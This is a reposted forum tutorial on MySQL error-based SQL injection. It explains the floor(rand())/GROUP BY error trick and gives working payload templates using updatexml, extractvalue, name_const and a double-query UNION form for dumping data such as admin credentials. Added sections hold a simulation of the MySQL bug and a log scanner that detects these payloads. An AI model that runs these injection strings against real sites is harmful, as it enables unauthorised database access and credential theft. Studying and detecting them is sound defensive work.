Reposted from: http://bbs.blackbap.org/forum.php?mod=viewthread&tid=6483
The ways of pulling database data out through SQL injection can be broadly divided into UNION queries, error-based injection, Boolean blind injection and time-based blind injection, and all of them normally assume that the injection point sits inside a SELECT statement. When the injection point is in a non-SELECT query, error-based injection is what we usually fall back on. First create a test table in MySQL:

    USE test;
    CREATE TABLE test (num INT(5));
    INSERT INTO test VALUES (1);
    INSERT INTO test VALUES (2);
    INSERT INTO test VALUES (3);
    INSERT INTO test VALUES (4);
    SELECT * FROM test;

The technique mainly relies on these MySQL functions and clauses:

1. rand()   # random-number function
2. floor()  # rounding-down function
3. count()  # aggregate function
4. GROUP BY # grouping clause

Principle: when a GROUP BY clause is combined with an aggregate function such as count(), part of the query result is reported back inside the error message. A simple example, starting with:

    USE test;

First look at how CONCAT is used:

    SELECT CONCAT("a","b");

It returns the two strings joined together. Now the other functions:

    SELECT RAND();

Anyone who has done some programming will know rand() as a function that produces a random number in the range (0,1). Next, floor():

    SELECT FLOOR(3.141216545);

This is clearly a rounding-down function. So for

    SELECT FLOOR(RAND()*2);

rand() ranges over (0,1), so rand()*2 ranges over (0,2), and floor(rand()*2) after rounding down is one of exactly two values, 0 or 1.

    SELECT CONCAT((SELECT database()), FLOOR(RAND()*2)) FROM test;

If we select this expression from a table we get back a mixture of test0 and test1 rows, and the number of rows is decided by the number of records in the table: selecting from the test table returns 4 rows. So how do we filter out the duplicated information? That is what GROUP BY is for: it is used together with aggregate functions to group the result set by one or more columns.
Let's look at:

    SELECT CONCAT((SELECT database()), FLOOR(RAND()*2)) AS a FROM test GROUP BY a;

Now there is far less useless output. Briefly: CONCAT((SELECT database()), FLOOR(RAND()*2)) AS a renames the computed column to a, and GROUP BY a groups rows that share the same value of column a, which is why only two distinct values are left. We can swap database() for anything else we want to read, such as version(), @@datadir and so on.

During injection we usually read the structure from MySQL's information_schema database. Database names come from the schema_name column of schemata:

    SELECT * FROM information_schema.schemata;

That lists my database names. Dumping table names:

    SELECT DISTINCT table_name FROM information_schema.tables;

The output is too long to paste here; go and run it yourself. With the table and column names known, the direct query would be:

    SELECT username, password FROM admin;

Once the database, table and column names are in hand, error-based injection lets us find whatever data we want:

    SELECT COUNT(*), CONCAT((SELECT version()), FLOOR(RAND()*2)) AS a FROM information_schema.tables GROUP BY a;

To make the output easier to read, add some markers:

    SELECT COUNT(*), CONCAT('--', (SELECT user()), '--', FLOOR(RAND()*2)) AS a FROM information_schema.tables GROUP BY a;

A more advanced form, the "double query" injection we actually use in practice, is simply a SELECT nested as a subquery inside another SELECT.
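The reason the GROUP BY above turns into an error (MySQL bug 8652, cited below) is that the grouping key is evaluated twice per new group: once to look the group up and once more to build the row that gets inserted. The following simulation is an added example and not code from the original post; the value sequence standing in for floor(rand(0)*2) is constructed and only its leading values are the ones commonly reported for MySQL.

```python
import itertools

# Constructed stand-in for floor(rand(0)*2): rand(0) is seeded, so its output
# is the same on every run. The leading values 0,1,1,0,1,1 are the ones commonly
# reported for MySQL; the rest of the cycle is illustrative only.
RAND0_FLOOR_SEQUENCE = [0, 1, 1, 0, 1, 1, 1, 0, 0, 1]


class DuplicateKeyError(Exception):
    """Stands in for MySQL's 'Duplicate entry ... for key group_key' error."""


def simulate_floor_rand_group_by(label, row_count):
    """Model how the GROUP BY temporary table is built for
        SELECT count(*), concat(label, floor(rand(0)*2)) a ... GROUP BY a
    MySQL evaluates the key expression once to look the group up and, if the
    group does not exist yet, evaluates it AGAIN to build the inserted row.
    With a non-deterministic key those two values can differ, so the inserted
    key may already exist: that is the duplicate-key error the article relies
    on. Returns the finished temp table {key: count} if no error occurs."""
    stream = itertools.cycle(RAND0_FLOOR_SEQUENCE)
    groups = {}
    for _ in range(row_count):
        probe = f"{label}{next(stream)}"      # 1st evaluation: lookup
        if probe in groups:
            groups[probe] += 1
            continue
        inserted = f"{label}{next(stream)}"   # 2nd evaluation: new row
        if inserted in groups:
            raise DuplicateKeyError(
                f"Duplicate entry '{inserted}' for key 'group_key'")
        groups[inserted] = 1
    return groups


def min_rows_to_error(label, limit=100):
    """Smallest row count at which the simulated GROUP BY fails, or None."""
    for rows in range(1, limit + 1):
        try:
            simulate_floor_rand_group_by(label, rows)
        except DuplicateKeyError:
            return rows
    return None


if __name__ == "__main__":
    print(simulate_floor_rand_group_by("test", 2))   # {'test1': 2}
    print(min_rows_to_error("test"))                 # 3
```

This is also why the error only appears once the source table has at least three rows, which is the reason information_schema.tables is the usual FROM target.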
The SELECT form is usually a fixed template, suited to UNION injections where no column is echoed back and the column count cannot be determined with ORDER BY:

    SELECT 1 FROM (SELECT COUNT(*), CONCAT(FLOOR(RAND(0)*2), (<statement that extracts the data>)) a FROM information_schema.tables GROUP BY a) b

The inner subquery is the basic error principle discussed above; UNION comes into it because the site's own query is a SELECT and we join ours to it with the UNION keyword. What if the injection point is not in a SELECT? Then we nest this statement inside the existing query some other way, for example with the OR keyword, which also works and is more flexible; details can be found in http://www.exploit-db.com/wp-content/themes/exploit/docs/33253.pdf (I originally wanted to paste a WooYun link but decided against it). A simple test shows that OR works. The statements mainly used are:

    or updatexml(1, concat(0x7e, (version())), 0) or ''
    or extractvalue(1, concat(0x7e, database())) or ''
    or (SELECT * FROM (SELECT(name_const(version(),1)), name_const(version(),1)) a) or ''

Those are basically the three kinds; some others are not posted. They are placed after the field in INSERT, DELETE and UPDATE statements. A simple INSERT example:

    INSERT INTO test VALUES (5 or updatexml(1, concat(0x7e, (version())), 0) or '');

Remember to append the two single quotes at the end! For more examples, search the forum; see the post at the links below. No demo here.

http://bbs.blackbap.org/thread-2360-1-1.html
http://bbs.blackbap.org/thread-2235-1-1.html

PS: The writing isn't great, experts please don't flame me; I don't know how to do layout, and what I care about is the content rather than the typesetting. Thanks for reading.

Reference articles:
http://www.cnseay.com/2363/
http://bugs.mysql.com/bug.php?id=8652
http://www.websec.ca/kb/sql_injection#MySQL_Specific_Code
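From the defender's side, the function names this post relies on (updatexml, extractvalue, floor(rand(...)), name_const) are distinctive enough to flag in web server logs. The scanner below is an added example, not code from the original post; the access-log lines it runs over are constructed samples, and the only assumption is that requests arrive URL-encoded as in a typical access log.

```python
import re
from urllib.parse import unquote_plus

# Function names used for MySQL error-based extraction. Matched after
# URL-decoding and lower-casing so encodings such as updatexml%28 are caught.
ERROR_BASED_PATTERNS = {
    "updatexml":    re.compile(r"updatexml\s*\("),
    "extractvalue": re.compile(r"extractvalue\s*\("),
    "floor_rand":   re.compile(r"floor\s*\(\s*rand\s*\("),
    "name_const":   re.compile(r"name_const\s*\("),
}


def classify_request(raw_request):
    """Return the names of error-based patterns found in one URL-encoded
    request line (empty list if none)."""
    decoded = unquote_plus(raw_request).lower()
    return [name for name, pat in ERROR_BASED_PATTERNS.items()
            if pat.search(decoded)]


def scan_access_log(lines):
    """Return (line_number, hits) for every log line carrying a pattern."""
    results = []
    for n, line in enumerate(lines, 1):
        hits = classify_request(line)
        if hits:
            results.append((n, hits))
    return results


# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2015:10:00:01] "GET /news.php?id=5 HTTP/1.1" 200',
    '10.0.0.9 - - [01/Jan/2015:10:00:02] "GET /news.php?id=5%20or%20updatexml(1,concat(0x7e,(version())),0)%20or%20%27%27 HTTP/1.1" 500',
    '10.0.0.9 - - [01/Jan/2015:10:00:03] "GET /news.php?id=5%20or%20extractvalue(1,concat(0x7e,database()))%20or%20%27%27 HTTP/1.1" 500',
    '10.0.0.9 - - [01/Jan/2015:10:00:04] "GET /news.php?id=1%20union%20select%201%20from(select%20count(*),concat(floor(rand(0)*2),version())a%20from%20information_schema.tables%20group%20by%20a)b HTTP/1.1" 500',
    '10.0.0.7 - - [01/Jan/2015:10:00:05] "GET /search.php?q=floor%20plan HTTP/1.1" 200',
]

if __name__ == "__main__":
    for n, hits in scan_access_log(SAMPLE_LOG):
        print(n, hits)
```

Pairing these hits with the 500 status the server returned is a useful second signal, since an error-based probe succeeds precisely when the database error reaches the page.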
(Original title: "Beginners Learn Injection": MySQL error-based injection explained)